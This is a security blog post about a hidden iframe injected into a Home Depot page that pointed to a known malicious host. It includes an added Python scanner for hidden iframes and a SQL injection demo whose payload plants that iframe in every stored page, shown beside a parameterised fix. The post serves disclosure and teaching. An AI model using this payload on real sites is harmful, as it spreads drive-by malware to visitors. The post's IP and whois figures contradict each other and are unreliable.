It is interesting how a minor home improvement project can result in the discovery of a hack on a major retail website. It all started with a simple Google search for “home depot stair spindles”.
The first unpaid result in the search is hxxp://www6.homedepot.com/stairparts/gallery.html as shown above.
As it turns out, there is an invisible iframe in this page that links to the external site vwui.in on port 8080 as shown below.
As can be seen in the screenshot, the below code has been injected into the page:
The site vwui.in is listed as a malicious site by both Google and StopBadWare, with one listing going back to July of 2009.
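The post does not reproduce the injected snippet, so the pattern it describes (an invisible iframe pulling content from an off-site host on a non-standard port) is worth showing as detection logic. The following scanner is an added example, not code from the original post; the sample page, the iframe attributes (zero width and height plus visibility:hidden) and the use of homedepot.com as the "own" domain are constructed assumptions modelled on the description above.

```python
"""Flag hidden <iframe> elements that point off-site (added example, constructed input)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

STANDARD_PORTS = {"http": 80, "https": 443}

# Constructed sample page. The real injected code is not reproduced in the post,
# so these attributes are an assumption about what such an injection looks like.
SAMPLE_HTML = """<html><head><title>Stair Parts Gallery</title></head>
<body>
<img src="/stairparts/spindle1.jpg" alt="spindle">
<iframe src="/stairparts/sizing.html" width="600" height="400"></iframe>
<iframe src="http://www.example.com/player" width="425" height="344"></iframe>
<iframe src="http://vwui.in:8080/" width="0" height="0" style="visibility:hidden"></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # Valueless attributes such as a bare "hidden" arrive as (name, None).
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_zero(value):
    """True for size values such as "0", "0px" or "0%"."""
    return re.fullmatch(r"0+(\.0+)?(px|%)?", value.strip().lower()) is not None


def is_hidden(attrs):
    """Heuristics for an iframe the visitor cannot see."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (
        "hidden" in attrs
        or _is_zero(attrs.get("width", "1"))
        or _is_zero(attrs.get("height", "1"))
        or "display:none" in style
        or "visibility:hidden" in style
    )


def is_external(src, site_domain):
    """True when src names a host outside site_domain (relative URLs are internal)."""
    host = urlsplit(src).hostname
    if host is None:
        return False
    host, site_domain = host.lower(), site_domain.lower()
    return not (host == site_domain or host.endswith("." + site_domain))


def nonstandard_port(src):
    """Return the explicit port if it is not the scheme's default, else None."""
    parts = urlsplit(src)
    try:
        port = parts.port
    except ValueError:  # malformed port in the URL
        return None
    if port is None or port == STANDARD_PORTS.get(parts.scheme.lower()):
        return None
    return port


def scan(html, site_domain):
    """Return one finding per iframe that is both hidden and off-site."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        if src and is_hidden(attrs) and is_external(src, site_domain):
            findings.append({
                "src": src,
                "host": urlsplit(src).hostname,
                "nonstandard_port": nonstandard_port(src),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_HTML, "homedepot.com"):
        print(finding)
```

Passing the registrable domain (homedepot.com) rather than the full hostname keeps embeds from the site's own subdomains out of the results, while the visible example.com player in the sample shows that an external iframe on its own is not a finding; it has to be hidden as well. The non-standard port is reported separately because, as the post notes later, it is a useful secondary indicator rather than proof of compromise.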
After I discovered this hack I decided to investigate the vwui.in site to try and determine what type of malware it was hosting. As it turns out, this domain no longer resolves.
[prompt ~]$ host vwui.in
Host vwui.in not found: 3(NXDOMAIN)
StopBadWare lists the IP associated with this domain as 188.8.131.52, which according to the whois database belongs to ThePlanet.com Internet Services.
[prompt ~]$ whois 184.108.40.206
Optical Jungle EVRY-753 (NET-209-85-51-0-1) 220.127.116.11 – 18.104.22.168
ThePlanet.com Internet Services, Inc. NETBLK-THEPLANET-BLK-EV1-15 (NET-209-85-0-0-1) 22.214.171.124 – 126.96.36.199
Furthermore, when this IP is accessed in a browser it redirects to hxxp://searchmanified.com, which also appears to be serving up some type of malware.
So how did this page on Home Depot’s website get compromised? While it’s not possible for me to know for certain without doing a complete investigation, I can make an educated guess. Typically, these types of attacks use one of several attack vectors:
- Compromised FTP credentials due to a weak password
- Brute force compromise of server credentials
- SQL injection
Back in 2009 tens of thousands of web sites were injected with hidden iframes that attempted to download malware when a visitor accessed one of the compromised sites. In many cases these attacks took advantage of SQL injection vulnerabilities to insert the hidden iframe.
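To make the SQL injection vector concrete, here is an added example (not code from the original post, and not a claim about how the Home Depot page was actually compromised): a constructed page-statistics handler that records the HTTP Referer into a content database using string formatting, beside its parameterised form. The table layout, the handler and the payload are all assumptions; the payload shows how a single injected UPDATE can append a hidden iframe to every stored page body, which is the effect the mass injections described above had.

```python
"""Stored-content iframe injection via SQL injection, vulnerable vs. parameterised (added example)."""
import sqlite3

# Constructed content store; the real site's schema is unknown.
SEED_PAGES = [
    ("/stairparts/gallery.html", "<h1>Stair Parts Gallery</h1>"),
    ("/stairparts/spindles.html", "<h1>Spindles</h1>"),
]

# Constructed attacker-supplied Referer value. It closes the quoted referrer,
# adds a second SET clause that appends a hidden iframe to every body, and
# comments out the original WHERE clause so all rows are updated.
PAYLOAD = (
    "x', body = body || '<iframe src=\"http://vwui.in:8080/\" width=\"0\" "
    "height=\"0\" style=\"visibility:hidden\"></iframe>' WHERE 1=1 -- "
)


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (path TEXT PRIMARY KEY, body TEXT, last_referrer TEXT)")
    db.executemany(
        "INSERT INTO pages (path, body, last_referrer) VALUES (?, ?, '')", SEED_PAGES
    )
    return db


def record_referrer_vulnerable(db, path, referrer):
    # Attacker-controlled text is spliced straight into the statement.
    sql = "UPDATE pages SET last_referrer = '%s' WHERE path = '%s'" % (referrer, path)
    db.execute(sql)


def record_referrer_safe(db, path, referrer):
    # Bound parameters: the driver sends the value separately from the SQL text,
    # so quotes and keywords inside it are stored literally.
    db.execute("UPDATE pages SET last_referrer = ? WHERE path = ?", (referrer, path))


def page_bodies(db):
    return dict(db.execute("SELECT path, body FROM pages"))


def demo(handler):
    """Run one request through the given handler and summarise what landed in the DB."""
    db = make_db()
    handler(db, "/stairparts/gallery.html", PAYLOAD)
    bodies = page_bodies(db)
    (referrer,) = db.execute(
        "SELECT last_referrer FROM pages WHERE path = ?", ("/stairparts/gallery.html",)
    ).fetchone()
    return {
        "pages_with_iframe": sum("<iframe" in body for body in bodies.values()),
        "gallery_referrer": referrer,
    }


if __name__ == "__main__":
    print("vulnerable:", demo(record_referrer_vulnerable))
    print("safe:      ", demo(record_referrer_safe))
```

With the vulnerable handler every page body gains the iframe and the recorded referrer is just "x"; with the parameterised handler no body changes and the whole payload is stored verbatim as an ordinary string. The payload needs no stacked queries, which is why an injection like this works even on drivers that refuse to run more than one statement at a time.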
They also tended to host their malware on port 8080 rather than the standard port 80.
Given that the server vwui.in was first listed as a malicious site back in 2009, that the malicious site uses port 8080, and that it no longer has any associated DNS records, it is quite possible that the Home Depot page was originally compromised as part of this massive attack in 2009 and has only now been discovered.
While the iframe in the Home Depot website is not currently a threat, the vulnerability that allowed it to be inserted into the page may still be present, which could lead to a future compromise of this site. I attempted to contact Home Depot to inform them of this issue, but as of this writing I have not received a response.
Originally posted at InfoSecStuff.com.